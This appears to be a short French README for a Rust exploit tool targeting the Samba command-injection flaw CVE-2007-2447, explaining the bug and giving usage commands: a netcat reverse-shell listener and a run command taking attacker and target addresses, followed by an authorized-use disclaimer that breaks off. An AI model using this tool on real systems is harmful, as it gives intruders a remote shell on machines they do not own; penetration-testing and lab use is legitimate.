
Une implémentation Rust autonome de l'exploit CVE-2007-2447 ciblant Samba smbd 3.0.20-Debian.
Une implémentation Rust autonome de l'exploit CVE-2007-2447 ciblant Samba smbd 3.0.20-Debian.
CVE-2007-2447 est une vulnérabilité d'injection de commandes dans les versions 3.0.0 à 3.0.25rc3 de Samba. La vulnérabilité existe dans la fonction SamrChangePassword(), qui ne nettoie pas correctement les entrées utilisateur, permettant aux attaquants d'exécuter des commandes arbitraires via des métacaractères shell dans le champ du nom d'utilisateur lors de l'authentification SMB.
netcat (généralement installé par défaut)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# Configurez un écouteur netcat
nc -lvnp 4444
# Exécutez l'exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost : Adresse IP de votre machine attaquante--lport : Port pour recevoir la connexion du shell inverse--target : Adresse IP de la machine cibleCet outil est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Utilisez-le de manière responsable et uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de